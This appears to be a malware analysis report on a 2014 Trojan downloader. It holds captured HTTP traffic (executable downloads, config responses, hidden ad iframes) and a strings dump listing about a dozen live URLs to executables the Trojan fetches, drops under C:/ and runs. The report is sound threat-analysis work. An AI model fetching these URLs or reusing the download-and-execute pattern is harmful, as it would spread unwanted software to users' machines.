.sogou a.logo:hover{width:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left top;_background:none;}
.sogou a.normal{}
-->
</style>
</head>

<body>
<iframe id="tanxcmiframe" width="0" height="0" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></iframe>
<script type="text/javascript">
var iheight = "60";
var fsize = iheight;
if (iheight >= 30)
{
 fsize = 30;
}
var mt_preview="0";
if (mt_preview == 1)
{
  var height0=60;
  var width0=460;
  if ((width0==120 && height0==600) || (width0==160 && height0==600) || (width0==200 && height0==200) || (width0==250 && height0==250) || (width0==300 && height0==250) || (width0==336 && height0==300) ||

<<< skipped >>>

GET /xxdd_165.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: ddl.9yfc.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.12
Date: Sat, 14 Jun 2014 08:56:32 GMT
Content-Type: application/octet-stream
Content-Length: 4409157
Last-Modified: Sat, 31 May 2014 06:56:10 GMT
Connection: keep-alive
Accept-Ranges: bytes

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=204800-409600
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 204800-409600/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:48 GMT

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:15 GMT

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=0-204800
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 0-204800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:48 GMT

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1843200-2048000
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1843200-2048000/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:01 GMT

<<< skipped >>>

GET /app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif HTTP/1.1
Accept: */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.sogoucdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 042441fc49b4b85c9d202cbbd0c95096
Expires: Sun, 13 Jul 2014 16:07:20 GMT
Cache-Control: max-age=2592000
Last-Modified: Fri, 13 Jun 2014 16:07:20 GMT

<<< skipped >>>

GET /Update/version.txt?45919992 HTTP/1.1
User-Agent: Update
Host: update.fhrlw.com


HTTP/1.1 200 OK
Content-Length: 72
Content-Type: .txt
Last-Modified: Fri, 13 Jun 2014 08:50:22 GMT
Accept-Ranges: bytes
ETag: "feb72083e486cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:21 GMT
[UpCfg]
Version=1.2.001
Force=1
KillClient=0
MsgTip=0
NoSlience=0


GET /app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg HTTP/1.1
Accept: */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgstore04.cdn.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 81348f8f42f879e735d0529c30d31e6d
Expires: Mon, 14 Jul 2014 05:41:35 GMT
Cache-Control: max-age=2592000
Last-Modified: Sat, 14 Jun 2014 05:41:35 GMT

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:22 GMT

<<< skipped >>>

GET /api/GetConfig.ashx HTTP/1.1
User-Agent: oemfhsli
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:00:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 330
{
"errno":"1",
"bindsoftcount":"0",
"onlinetimelength":"0",
"rightdowncount":"1",
"setupcode":"ae9b8922d6184874896f5561d8fe0643",
"showminitab":"1",
"minitabtimer":"61",
"poptabtimer":"48",
"minitabrate":"180",
"poptabrate":"68",
"silentonlinetimelength":"130000",
"closeMiniUrl":"hXXp://cnrdn.com/eYFE",
"closePopUrl":"hXXp://cnrdn.com/eYFE"
}



GET /api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=0 HTTP/1.1
User-Agent: oemfhsli
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 38
{"errno":"1","filter":"1","valid":"0"}


GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:43 GMT
Content-Type: text/plain
Content-Length: 142
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:43 2014
X-XSS-Protection: 0
Set-Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; expires=Sun, 14-Jun-15 09:00:43 GMT; max-age=31536000; path=/; domain=.sogou.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
SOGOU_STAR_SETJSONADSLOT({
"341269" : {
"id":341269,
"w":460,
"h":60,
"m":"MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-",
"isf":"0",
"cs":"0"
}});



GET /ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Content-Length: 7405
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUID=E7F48AC12141900A539C0F3B000F06DC; path=/; expires=Mon, 13 Jun 2016 09:00:43 GMT; domain=sogou.com
Set-Cookie: ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:43 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
<html>
<head>
<title></title>
<style>
<!--
body{margin:0;background-color:transparent;}
.sogou{width:460px;height:60px;position:relative;overflow:hidden;}
a.logo{display:block;height:18px;width:26px;text-align:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cursor:default;position:absolute;bottom:0px;right:0px;}
.sogou a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_background:none;}
.sogou a.logo:hover{width:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left top;_background:none;}
.sogou a.normal{}
-->
</style>
</head>

<body>
<iframe id="tanxcmiframe" width="0" height="0" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></iframe>
<script type="text/javascript">
var iheight = "60";
var fsize = iheight;
if (iheight >= 30)
{
 fsize = 30;
}
var mt_preview="0";
if (mt_preview == 1)
{
  var height0=60;
  var width0=460;
  if ((width0==120 && height0==600) || (width0==160 && height0==600) || (width0==200 && height0==200) || (width0==250 && height0==250) || (width0==300 && height0==250) || (width0==336 && height0==300) ||

<<< skipped >>>

GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:45 GMT
Content-Type: text/plain
Content-Length: 160
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:45 2014
X-XSS-Protection: 0
SOGOU_STAR_SETJSONADSLOT({
"341269" : {
"id":341269,
"w":460,
"h":60,
"m":"MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-",
"isf":"0",
"cs":"1985823318692344632"
}});



GET /ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Content-Length: 7404
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ad=vLpiSyllll2FXlDElllllVntR8DlllllZYr1iZllllGlllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:47 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:47 2014
X-XSS-Protection: 0
<html>.<head>.<title></title>.<style>.&l
t;!--.body{margin:0;background-color:transparent;}..sogou{width:460px;
height:60px;position:relative;overflow:hidden;}.a.logo{display:block;
height:18px;width:26px;text-align:justify;letter-spacing:20px;text-dec
oration:none;overflow:hidden;cursor:default;position:absolute;bottom:0
px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.
AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/s
ogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.int
e.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_backgr
ound:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransf
orm.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.c
om/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url
(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left
top;_background:none;}..sogou a.normal{}.-->.</style>.</h
ead>..<body>.<iframe id="tanxcmiframe" width="0" height="0
" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></i
frame>.<script type="text/javascript">.var iheight = "60";.va
r fsize = iheight;.if (iheight >= 30).{. fsize = 30;.}.var mt_pr
eview="0";.if (mt_preview == 1).{.. var height0=60;.. var width0=460
;.. if ((width0==120 && height0==600) || (width0==160 && height0==600
) || (width0==200 && height0==200) || (width0==250 && height0==250) ||
(width0==300 && height0==250) || (width0==336 && height0==300) ||

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1638400-1843200
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1638400-1843200/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:16 GMT

<<< skipped >>>

GET /api/GetConfig.ashx HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 330
{"errno":"1","bindsoftcount":"0","onlinetimelength":"0","rightdowncoun
t":"1","setupcode":"0d28db4036a945fd9e9761f04cd18d62","showminitab":"1
","minitabtimer":"61","poptabtimer":"48","minitabrate":"180","poptabra
te":"68","silentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrd
n.com/eYFE","closePopUrl":"hXXp://cnrdn.com/eYFE"}
....



GET /Api/GetHoliday.ashx HTTP/1.1

User-Agent: FhCalendar
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 876
{"errno":"1","info":[{"holidayname":"......","holiday":"2014-01-31","r
estday":"2014-01-31,2014-02-01,2014-02-02,2014-02-03,2014-02-04,2014-0
2-05,2014-02-06","work":"2014-01-26,2014-02-08"},{"holidayname":".....
.","holiday":"2014-01-01","restday":"2014-01-01","work":""},{"holidayn
ame":".........","holiday":"2014-04-05","restday":"2014-04-05,2014-04-
06,2014-04-07","work":""},{"holidayname":".........","holiday":"2014-0
5-01","restday":"2014-05-01,2014-05-02,2014-05-03","work":"2014-05-04"
},{"holidayname":".........","holiday":"2014-06-02","restday":"2014-05
-31,2014-06-01,2014-06-02","work":""},{"holidayname":".........","holi
day":"2014-09-08","restday":"2014-09-06,2014-09-07,2014-09-08","work":
""},{"holidayname":".........","holiday":"2014-10-01","restday":"2014-
10-01,2014-10-02,2014-10-03,2014-10-04,2014-10-05,2014-10-06,2014-10-0
7","work":"2014-09-28,2014-10-11"}]}
....



GET /Api/GetWeather.ashx?province=??&city=?? HTTP/1.1

User-Agent: FhCalendar
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 13
{"error":"0"}


GET /cms.gif?id=40490128&extendata= HTTP/1.1
Accept: */*
Referer: hXXp://dspcm.brand.sogou.com/qi
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: acookie.tanx.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: Tengine
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: image/gif
Transfer-Encoding: chunked
Connection: close
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Location: hXXp://dspcm.brand.sogou.com/pixel?tid=E0&ver=1&extendata=
31..GIF89a...................!.......,...........T..;..0..


GET /oemini/info.ini?id=41 HTTP/1.1
User-Agent: oemfhsli
Host: software.fhrlw.cn


HTTP/1.1 200 OK
Content-Length: 997
Content-Type: .ini
Last-Modified: Fri, 13 Jun 2014 08:44:03 GMT
Accept-Ranges: bytes
ETag: "4415c5a0e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:47 GMT
[Info]..FileCount = 1..Rate0 = 100..Rate1 = 70..[File0]..FileName=fhrl
_0613.exe..FileDir= fhrl..FileTitle= ..........DocUrl = hXXp://VVV.fhr
lw.com/readme.html..urlCount=2..url0=hXXp://dl1.fhrlw.com/fhrl/fhrl_06
13.exe..url1=hXXp://dl2.fhrlw.com/fhrl/fhrl_0613.exe....BlockCount=12.
.BlockSize0=204800..Hash0=31171D0C6216B1555E85D7EC89AF40F1..BlockSize1
=204800..Hash1=E1AA7FC27B8979618CF31CD1CF06829B..BlockSize2=204800..Ha
sh2=0C88B5B81B4BCDB92DDD042D79554E5E..BlockSize3=204800..Hash3=3CF4215
3EC58C3560A92DC9062CA08A6..BlockSize4=204800..Hash4=C3C74AB7AE92A4ACFE
EE460E8AEA6C47..BlockSize5=204800..Hash5=0E120EA4DA635D3847459411AC674
1E0..BlockSize6=204800..Hash6=D7C70FED90A30442DDAB5FCE3BDDB3A1..BlockS
ize7=204800..Hash7=654F71158BB01559F0A6D0DAC1318A3E..BlockSize8=204800
..Hash8=8843F00044AF9C94DAFB599CFB583203..BlockSize9=204800..Hash9=9DD
6488FBA152DA7B3C4DCECDF778EDA..BlockSize10=204800..Hash10=CC86E269AB6B
2D6CB588D3F69C7D00B3..BlockSize11=174816..Hash11=CFE74D55CD85196E8D934
D31902D9D1B..

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_1832:

.text
`.rdata
@.data
.rsrc
.aspack
.adata
t$(SSh
~%UVW
u$SShe
kernel32.dll
user32.dll
EnumWindows
ShellExecuteA
http://software.fhrlw.cn/slience/fhsli_6_12001.exe
C:/fhsli_6_12001.exe
C://fhsli_6_12001.exe
http://ddl.9yfc.com/xxdd_165.exe
C:/xxdd_165.exe
C://xxdd_165.exe
http://wuji.oss-cn-hangzhou.aliyuncs.com/qd/114gglm_016.exe
C:/114gglm_016.exe
C://114gglm_016.exe
http://dl.meinvkankan.com/goodpic_dae_627.exe
C:/goodpic_dae_627.exe
C://goodpic_dae_627.exe
http://lm.beilequ.com/update/365/365weatherIns_137.exe
C:/365weatherIns_137.exe
C://365weatherIns_137.exe
http://home.yj005.com/JBDownload/jbist_[2018].exe
C:/jbist_[2018].exe
C://jbist_[2018].exe
http://down.duomi.com/DuomiMusic_V306.exe
C:/DuomiMusic_V306.exe
C://DuomiMusic_V306.exe
http://down.shuyeer.net/dudu/dudu_b_55279.exe
C:/dudu_b_55279.exe
C://dudu_b_55279.exe
http://dianxinshu.92ttz.com/download/setup_s1002.exe
C:/setup_s1002.exe
C://setup_s1002.exe
http://qq2847894.b.xundisk.net/x1.exe
c:/x1.exe
c://x1.exe
http://boxdown.gtui.cn/KXWebDown/KXWebBox_3317_RBF.exe
C:/KXWebBox_3317_RBF.exe
C://KXWebBox_3317_RBF.exe
bbs.125.la
tem.vbs
fso.DeleteFile("
Set fso = CreateObject("Scripting.FileSystemObject")
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
RASAPI32.dll
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
u.ht*D
@u.Wj
hhctrl.ocx
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
File%d
MSWHEEL_ROLLMSG
GDI32.DLL
MSH_SCROLL_LINES_MSG
{X-X-X-XX-XXXXXX}
ddeexec
%s\ShellNew
%s\DefaultIcon
%s\shell\printto\%s
%s\shell\print\%s
%s\shell\open\%s
ECTrans.dll
RegEnumKeyA
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyA
Backup\Backup.ini
KINGSOFTFASTAIT3CHNEXEMUTEX
SOFTWARE\Kingsoft\FastAIT\3.0\ChnEXE
CChnEXEDoc
KPGs\*.KPG
KPGMaker.exe
ChnEXE.chm
KPIs\*.KPI
TEMPPE.WN
.?AVCToolCmdUI@@
.?AVCStatusCmdUI@@
KERNEL32.DLL
CJKTAB32.dll
c:\KConvert Files
\/:*?"<>|
%s%s%d%s
:?0_1#"9
#include "l.chs\afxres.rc" // Standard components
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
rasapi32.dll
gdi32.dll
winmm.dll
winspool.drv
advapi32.dll
shell32.dll
oleaut32.dll
comctl32.dll
ws2_32.dll
wininet.dll
CHNEXE
2, 0, 0, 2
ChnEXE
ChnEXE.EXE
ChnEXE.Document
ChnEXE Document
(*.*)
%s ...1
%s ...#
%s ...
(*.EXE)|*.exe|
Output.prn$
1, 0, 0, 0
KConvert.EXE
KConvert.Document
\ / : * ? " < > |
(*.*)|*.*||
1.0.0.0
